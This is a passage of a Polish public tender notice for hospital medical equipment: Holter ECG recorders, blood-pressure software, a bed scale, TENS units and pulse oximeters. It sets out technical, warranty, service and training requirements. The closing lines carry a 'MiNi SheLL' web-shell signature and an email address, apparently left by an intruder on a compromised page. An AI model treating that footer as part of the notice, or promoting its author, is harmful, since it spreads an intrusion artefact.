18	Prezentacja średnich godzinowych w formie graficznej wartości ciśnienia skurczowego, rozkurczowego, częstości rytmu. Możliwość porównania z innym badaniem tego samego pacjenta	TAK		
19	Możliwość wyboru automatycznego podsumowania badania na podstawie norm JNC7/AHA i ESH/AHA	TAK		
20	Możliwość konfiguracji raportu	TAK		
21	Możliwość eksportu raportu w formie pliku PDF	TAK		
22	Możliwość eksportu wykonanego badania do GDT i ASCII. 
Wbudowany konfigurator eksportu	TAK		
23	Możliwość eksportu wybranego badania za pomocą poczty e-mail	TAK		
24	Możliwość konfiguracji kolorystyki wykresów	TAK		
25	Możliwość testu poprawności komunikacji oprogramowania z rejestratorem	TAK		
26	Możliwość programowania różnych konfiguracji ustawień oprogramowania	TAK		
27	Możliwość konfiguracji wielu użytkowników z dostępem chronionym hasłem	TAK		
28	Funkcja automatycznego wylogowania użytkownika 
po określonym (konfigurowalnym) okresie bezczynności	TAK		
III	Inne	TAK		
1	Oświadczenie, potwierdzające dopuszczenie do używania na terenie RP zgodnie z Ustawą o Wyrobach Medycznych	TAK		
2	Dołączyć folder wraz z opisem do oferty	TAK		
3	Instrukcja obsługi i opis techniczny w języku polskim - przy dostawie sprzętu	TAK		

               II.   OPIS PRZEDMIOTU ZAMÓWIENIA -ZESTAWIENIE WARUNKÓW GRANICZNYCH GWARANCJI 
L.p.	
PARAMETR	WARUNEK GRANICZNY	WARUNEK OFEROWANY
D.	OKRES GWARANCJI		
6.		Okres pełnej bezpłatnej gwarancji  [miesiące]	min. 24 miesiące 	PODAĆ  ILE
7.		Czas reakcji na zgłoszoną awarię [godz.]	         max 48 godzin	PODAĆ  ILE
8.		Każda naprawa gwarancyjna powoduje przedłużenie okresu gwarancji o czas naprawy 	TAK	
9.		Liczba bezpłatnych przeglądów w czasie gwarancji 	Zgodnie z zaleceniami producenta	PODAĆ  ILE
10.		Koszt transportu uszkodzonego elementu urządzenia lub urządzenia podlegającego naprawie lub wymianie do i z punktu serwisowego pokrywa Wykonawca	TAK	
	
E.	SERWIS POGWARANCYJNY	
4.		Okres zagwarantowania dostępności części zamiennych oraz materiałów zużywalnych od daty podpisania protokołu odbioru technicznego [w latach ].	min. 10 lat	PODAĆ  ILE
5.		Okres gwarancji dla nowo zainstalowanych elementów po naprawie	min.6 miesięcy	PODAĆ  ILE
6.		Inne		PODAĆ  JEŚLI  WYSTĘPUJĄ
F.	SZKOLENIA	
4.		Personel medyczny w zakresie obsługi i eksploatacji sprzętu w ramach zakupu sprzętu:
- przy uruchomieniu zestawu
-odświeżające bezpośrednio w ramach przeglądu okresowego oraz  
 przed ukończeniem okresu gwarancji 	TAK	
5.		Personel techniczny w zakresie obsługi i eksploatacji  w ramach zakupu sprzętu	TAK	
6.		Inne 		PODAĆ  JEŚLI  WYSTĘPUJĄ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3 
Przedmiotem zamówienia jest dostawa rejestratorów EKG metodą Holtera  - 2 kpl., montaż, instalacja, uruchomienie (rozruch) i przeszkolenie personelu Zamawiającego w zakresie jego obsługi i eksploatacji.
Kod CPV -33120000-0 
Producent 
Typ urządzenia 
Kraj pochodzenia Rok produkcji 2012
III.	OPIS PRZEDMIOTU ZAMÓWIENIA - ZESTAWIENIE PARAMETRÓW TECHNICZNYCH
L.P.	FUNKCJA/PARAMETR	WARUNEK GRANICZNY	

J.M.	
PARAMETRY 
OFEROWANE
I.	Oprogramowanie do badań Holtera EKG	TAK	1 szt.	
1	Przeglądanie fragmentów EKG w trybie stronicowym	TAK		
2	Przeglądanie EKG w trybie wstęg (strip)	TAK		
3	Analiza w trybie prospektywnym i retrospektywnym	TAK		
4	Analiza automatyczna oparta na tworzeniu wzorców pobudzeń	TAK		
5	Automatyczna analiza arytmii komorowych i nadkomorowych	TAK		
6	Automatyczna analiza odcinka ST	TAK		
7	Możliwość konfiguracji parametrów analizy	TAK		
8	Możliwość korekty klasyfikacji każdego pobudzenia	TAK		
9	Automatyczny dobór przykładów ilustrujących epizody arytmii i zmiany odcinka ST	TAK		
10	Baza danych pacjentów i badań	TAK		
11	Możliwość konfiguracji raportu końcowego	TAK		
12	Możliwość analizy zapisów dłuższych niż 36 godzin	TAK		
13	Możliwość analizy zapisów z dwunastu odprowadzeń	TAK		
14	Możliwość wyboru analizowanych kanałów od 1 do 3	TAK		
15	Możliwość ustawienia punktów pomiarowych ST niezależnie dla każdego kanału	TAK		
16	Natychmiastowy dostęp do zapisu EKG z dowolnego poziomu analizy (tabele, trendy)	TAK		
17	Możliwość prezentacji pobudzeń z danej klasy w trybie stronicowym	TAK		
18		Możliwość bezpośredniej edycji tabeli arytmii	TAK		
19		Wykrywanie epizodów uniesień odcinka ST z uwzględnieniem nachylenia	TAK		
20		Analiza epizodów obniżenia odcinka ST z uwzględnieniem rodzaju nachylenia	TAK		
21		Trendy ST w formie wykresów 3D	TAK		
22		Automatyczna kalibracja	TAK		
23		Możliwość wyłączenia z analizy fragmentów zapisu	TAK		
24		Możliwość bezprzewodowej komunikacji z rejestratorem	TAK		
25		Archiwizacja danych	TAK		
II		Rejestrator EKG holterowski 3-kanałowy 2 szt.	TAK	2 szt.	
1		Rejestrator cyfrowy	TAK		
2		Liczba rejestrowanych odprowadzeń min. 3	TAK		
3		Czas rejestracji 48 godzin	TAK		
4		Liczba elektrod max. 7	TAK		
5		Automatyczna rejestracja momentu rozpoczęcia badania (data, godzina)	TAK		
6		Rejestracja bez kompresji danych	TAK		
7		Przycisk zdarzeń pacjenta	TAK		
8		Detekcja pików rozrusznika serca	TAK		
9		Zasilanie z jednej baterii AA 1,5 V	TAK		
10	Konsola stanu baterii oraz podłączenia elektrod	TAK		
11	Podgląd zapisu EKG na monitorze komputera w czasie rzeczywistym	TAK		
12	Zachowanie danych EKG bez zasilania rejestratora	TAK		
13		Sygnalizacja stanu aktywności rejestratora	TAK		
14		Masa max. 135 gram	TAK		
15	Możliwość analizy zapisu rejestratora na posiadanej przez Zamawiającego starszej wersji oprogramowania analizatora Holtera EKG z roku 2002 firmy Aspel.	TAK		
III	Inne	TAK		
1	Oświadczenie, potwierdzające dopuszczenie do używania na terenie RP zgodnie z Ustawą o Wyrobach Medycznych	TAK		
2	Dołączyć folder wraz z opisem do oferty	TAK		
3	Instrukcja obsługi i opis techniczny w języku polskim - przy dostawie sprzętu	TAK		

               II.   OPIS PRZEDMIOTU ZAMÓWIENIA -ZESTAWIENIE WARUNKÓW GRANICZNYCH GWARANCJI 
L.p.	
PARAMETR	WARUNEK GRANICZNY	WARUNEK OFEROWANY
G.	OKRES GWARANCJI		
11.		Okres pełnej bezpłatnej gwarancji  [miesiące]	min. 24 miesiące 	PODAĆ  ILE
12.		Czas reakcji na zgłoszoną awarię [godz.]	         max 48 godzin	PODAĆ  ILE
13.		Każda naprawa gwarancyjna powoduje przedłużenie okresu gwarancji o czas naprawy 	TAK	
14.		Liczba bezpłatnych przeglądów w czasie gwarancji 	zgodnie z zaleceniami producenta	PODAĆ  ILE
15.		Koszt transportu uszkodzonego elementu urządzenia lub urządzenia podlegającego naprawie lub wymianie do i z punktu serwisowego pokrywa Wykonawca	TAK	
	
H.	SERWIS POGWARANCYJNY	
7.		Okres zagwarantowania dostępności części zamiennych oraz materiałów zużywalnych od daty podpisania protokołu odbioru technicznego [w latach ].	min. 10 lat	PODAĆ  ILE
8.		Okres gwarancji dla nowo zainstalowanych elementów po naprawie	min.6 miesięcy	PODAĆ  ILE
9.		Inne		PODAĆ  JEŚLI  WYSTĘPUJĄ
I.	SZKOLENIA	
7.		Personel medyczny w zakresie obsługi i eksploatacji sprzętu w ramach zakupu sprzętu:
- przy uruchomieniu zestawu
-odświeżające bezpośrednio w ramach przeglądu okresowego oraz  
 przed ukończeniem okresu gwarancji 	TAK	
8.		Personel techniczny w zakresie obsługi i eksploatacji  w ramach zakupu sprzętu	TAK	
9.		Inne 		PODAĆ  JEŚLI  WYSTĘPUJĄ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 4 
Przedmiotem zamówienia jest dostawa wagi łóżkowej  - 1 kpl., montaż, instalacja, uruchomienie (rozruch) i przeszkolenie personelu Zamawiającego w zakresie jego obsługi i eksploatacji.
Kod CPV -33190000-8
Producent Typ urządzenia Kraj pochodzenia Rok produkcji 2012
IV.	OPIS PRZEDMIOTU ZAMÓWIENIA - ZESTAWIENIE PARAMETRÓW TECHNICZNYCH
L.P.	FUNKCJA/PARAMETR	WARUNEK GRANICZNY	

J.M.	
PARAMETRY 
OFEROWANE
I	Waga łóżkowa	TAK	1 kpl.	
1	Cztery moduły ważące połączone przewodami umożliwiające podłożenie pod łóżko o dowolnym rozstawie kół	TAK		
2	Podnośnik do unoszenia łóżka przystosowany do kół o średnicach w zakresie minimum od 100 do 200 mm	TAK		
3	Głowica pomiarowa z podświetlanym wyświetlaczem	TAK		
4	Zasilanie z odłączalnego zasilacza 230 VAC	TAK		
5	Dla zabezpieczenia ciągłości pomiaru w wypadku zaniku zasilania miernik wyposażony w zasilanie akumulatorowe	TAK		
6	W standardzie złącze RS 232	TAK		
7	Waga wyposażona w wózek transportowy pełniący jednocześnie funkcję stojaka wyświetlacza	TAK		
8	Obciążenie maksymalne minimum 500 kg	TAK		
9	Dokładność odczytu minimum 200 g	TAK		
10	Zakres tary minimum - 500 kg	TAK		
11	Wyświetlacz LCD z podświetleniem	TAK		
II	Inne	TAK		
1	Oświadczenie, potwierdzające dopuszczenie do używania na terenie RP zgodnie z Ustawą o Wyrobach Medycznych	TAK		
2	Dołączyć folder wraz z opisem do oferty	TAK		
3	Instrukcja obsługi i opis techniczny w języku polskim - przy dostawie sprzętu	TAK		

               II.   OPIS PRZEDMIOTU ZAMÓWIENIA -ZESTAWIENIE WARUNKÓW GRANICZNYCH GWARANCJI 
L.p.	
PARAMETR	WARUNEK GRANICZNY	WARUNEK OFEROWANY
J.	OKRES GWARANCJI		
16.		Okres pełnej bezpłatnej gwarancji  [miesiące]	min. 24 miesiące 	PODAĆ  ILE
17.		Czas reakcji na zgłoszoną awarię [godz.]	         max 48 godzin	PODAĆ  ILE
18.		Każda naprawa gwarancyjna powoduje przedłużenie okresu gwarancji o czas naprawy 	TAK	
19.		Liczba bezpłatnych przeglądów w czasie gwarancji 	Zgodnie z zaleceniami producenta	PODAĆ  ILE
20.		Koszt transportu uszkodzonego elementu urządzenia lub urządzenia podlegającego naprawie lub wymianie do i z punktu serwisowego pokrywa Wykonawca	TAK	
	
K.	SERWIS POGWARANCYJNY	
10.		Okres zagwarantowania dostępności części zamiennych oraz materiałów zużywalnych od daty podpisania protokołu odbioru technicznego [w latach ].	min. 10 lat	PODAĆ  ILE
11.		Okres gwarancji dla nowo zainstalowanych elementów po naprawie	min.6 miesięcy	PODAĆ  ILE
12.		Inne		PODAĆ  JEŚLI  WYSTĘPUJĄ
L.	SZKOLENIA	
10.		Personel medyczny w zakresie obsługi i eksploatacji sprzętu w ramach zakupu sprzętu:
- przy uruchomieniu zestawu
-odświeżające bezpośrednio w ramach przeglądu okresowego oraz  
 przed ukończeniem okresu gwarancji 	TAK	
11.		Personel techniczny w zakresie obsługi i eksploatacji  w ramach zakupu sprzętu	TAK	
12.		Inne 		PODAĆ  JEŚLI  WYSTĘPUJĄ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 5  
Przedmiotem zamówienia jest dostawa tensów do łagodzenia przewlekłych bólów  - 4 kpl., montaż, instalacja, uruchomienie (rozruch) i przeszkolenie personelu Zamawiającego w zakresie jego obsługi i eksploatacji.
Kod CPV -33158210-7 
Producent 
Typ urządzenia Kraj pochodzenia 
Rok produkcji 2012
V.	OPIS PRZEDMIOTU ZAMÓWIENIA - ZESTAWIENIE PARAMETRÓW TECHNICZNYCH
L.P.	FUNKCJA/PARAMETR	WARUNEK GRANICZNY	

J.M.	
PARAMETRY 
OFEROWANE
I.	Tens do łagodzenia przewlekłych bólów	TAK	4 kpl.	
1	Zaprogramowane gotowe programy terapeutyczne	TAK		
2	Liczba kanałów minimum 2	TAK		
3	Maksymalna stymulacja impuls 0-60 mA	TAK		
4	Zakres częstotliwość impulsów minimum 2-150 impulsów s (pps)	TAK
		
5	Czas trwania impulsu minimum 0-400 mikrosekund przy 50 % amplitudy piku, regulowany	TAK
		
6	Długość impulsu minimum 60-400 mikrosekund	TAK		
7	Maksymalna ilość ładunków elektrycznych impuls 30 C	TAK		
8	Wyświetlacz pokazuje minimum: liczbę sesji, średni czas trwania sesji, całkowitą liczbę godzin użytkowania, średnią intensywność dla kanału 1 i kanału 2	TAK		
9	Akumulatorowe lub bateryjne	TAK
		
10	Wymiary maksimum 110x61x35 mm	TAK
		
11	Waga maksimum 140 g	TAK
		
II	Inne	TAK		
1	Oświadczenie, potwierdzające dopuszczenie do używania na terenie RP zgodnie z Ustawą o Wyrobach Medycznych	TAK		
2	Dołączyć folder wraz z opisem do oferty	TAK		
3	Instrukcja obsługi i opis techniczny w języku polskim - przy dostawie sprzętu	TAK		

               II.   OPIS PRZEDMIOTU ZAMÓWIENIA -ZESTAWIENIE WARUNKÓW GRANICZNYCH GWARANCJI 
L.p.	
PARAMETR	WARUNEK GRANICZNY	WARUNEK OFEROWANY
M.	OKRES GWARANCJI		
21.		Okres pełnej bezpłatnej gwarancji  [miesiące]	min. 24 miesiące 	PODAĆ  ILE
22.		Czas reakcji na zgłoszoną awarię [godz.]	        max 48 godzin	PODAĆ  ILE
23.		Każda naprawa gwarancyjna powoduje przedłużenie okresu gwarancji o czas naprawy 	TAK	
24.		Liczba bezpłatnych przeglądów w czasie gwarancji 	zgodnie z zaleceniami producenta	PODAĆ  ILE
25.		Koszt transportu uszkodzonego elementu urządzenia lub urządzenia podlegającego naprawie lub wymianie do i z punktu serwisowego pokrywa Wykonawca	TAK	
	
N.	SERWIS POGWARANCYJNY	
13.		Okres zagwarantowania dostępności części zamiennych oraz materiałów zużywalnych od daty podpisania protokołu odbioru technicznego [w latach ].	min. 10 lat	PODAĆ  ILE
14.		Okres gwarancji dla nowo zainstalowanych elementów po naprawie	min.6 miesięcy	PODAĆ  ILE
15.		Inne		PODAĆ  JEŚLI  WYSTĘPUJĄ
O.	SZKOLENIA	
13.		Personel medyczny w zakresie obsługi i eksploatacji sprzętu w ramach zakupu sprzętu:
- przy uruchomieniu zestawu
-odświeżające bezpośrednio w ramach przeglądu okresowego oraz  
 przed ukończeniem okresu gwarancji 	TAK	
14.		Personel techniczny w zakresie obsługi i eksploatacji w ramach zakupu sprzętu	TAK	
15.		Inne 		PODAĆ  JEŚLI  WYSTĘPUJĄ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.82.10-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 6 
Przedmiotem zamówienia jest dostawa pulsoksymetru  - 2 kpl., montaż, instalacja, uruchomienie (rozruch) i przeszkolenie personelu Zamawiającego w zakresie jego obsługi i eksploatacji.
Kod CPV -33120000-7 
Producent Typ urządzenia Kraj pochodzenia Rok produkcji 2012
VI.	OPIS PRZEDMIOTU ZAMÓWIENIA - ZESTAWIENIE PARAMETRÓW TECHNICZNYCH
L.P.	FUNKCJA/PARAMETR	WARUNEK GRANICZNY	

J.M.	
PARAMETRY 
OFEROWANE
I.	Pulsoksymetr przenośny	TAK	2 kpl.	
1	Wyrywkowe sprawdzanie pulsu w trybie ciągłego monitoringu	TAK		
2	Synchronizacja z PC oparte Sofrware (WinXP )	TAK		
3	Wyświetlacz minimum 1, 8 cala kolorowy TFT	TAK
		
4	Rozdzielczość minimum 160x96	TAK
		
5	Tryb wyświetlania-wyświetlacz kierunek regulowany	TAK		
6	Wskaźniki: zasilania, sygnał dźwiękowy, dźwięk pulsu	TAK		
7	Interfejs: gniazdo do podłączenia czujników SpO2, gniazdo do kabli komunikacyjnych	TAK		
8	Zasilanie bateryjne	TAK
		
9	Nagrywanie: dane mogą być zapisywane do min 24 godzin	TAK
		
10	Waga maksimum 136 g ( z baterią)	TAK
		
11	Zakres pomiaru 0-100%	TAK
		
12	Dokładność  + - 2% ( 70%-100%)	TAK		
13	Zakres alarmu 0%-100%	TAK		
14	Odświeżanie 1s	TAK
		
15	Zakres pomiaru pulsu 25-250 bpm	TAK
		
16	Rozdzielczość 1 bpm	TAK		
17	Dokładność + - 3 bpm (bez ruchu)	TAK		
18	Zakres alarmu 25-250 bpm	TAK		
19	Odświeżanie 1 s	TAK		
II	Inne	TAK		
1	Oświadczenie, potwierdzające dopuszczenie do używania na terenie RP zgodnie z Ustawą o Wyrobach Medycznych	TAK		
2	Dołączyć folder wraz z opisem do oferty	TAK		
3	Instrukcja obsługi i opis techniczny w języku polskim - przy dostawie sprzętu	TAK		

               II.   OPIS PRZEDMIOTU ZAMÓWIENIA -ZESTAWIENIE WARUNKÓW GRANICZNYCH GWARANCJI 
L.p.	
PARAMETR	WARUNEK GRANICZNY	WARUNEK OFEROWANY
P.	OKRES GWARANCJI		
26.		Okres pełnej bezpłatnej gwarancji  [miesiące]	min. 24 miesiące 	PODAĆ  ILE
27.		Czas reakcji na zgłoszoną awarię [godz.]	       max 48 godzin	PODAĆ  ILE
28.		Każda naprawa gwarancyjna powoduje przedłużenie okresu gwarancji o czas naprawy 	TAK	
29.		Liczba bezpłatnych przeglądów w czasie gwarancji 	zgodnie z zaleceniami producenta	PODAĆ  ILE
30.		Koszt transportu uszkodzonego elementu urządzenia lub urządzenia podlegającego naprawie lub wymianie do i z punktu serwisowego pokrywa Wykonawca	TAK	
	
Q.	SERWIS POGWARANCYJNY	
16.		Okres zagwarantowania dostępności części zamiennych oraz materiałów zużywalnych od daty podpisania protokołu odbioru technicznego [w latach ].	min. 10 lat	PODAĆ  ILE
17.		Okres gwarancji dla nowo zainstalowanych elementów po naprawie	min.6 miesięcy	PODAĆ  ILE
18.		Inne		PODAĆ  JEŚLI  WYSTĘPUJĄ
R.	SZKOLENIA	
16.		Personel medyczny w zakresie obsługi i eksploatacji sprzętu w ramach zakupu sprzętu:
- przy uruchomieniu zestawu
-odświeżające bezpośrednio w ramach przeglądu okresowego oraz  
 przed ukończeniem okresu gwarancji 	TAK	
17.		Personel techniczny w zakresie obsługi i eksploatacji  w ramach zakupu sprzętu	TAK	
18.		Inne 		PODAĆ  JEŚLI  WYSTĘPUJĄ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com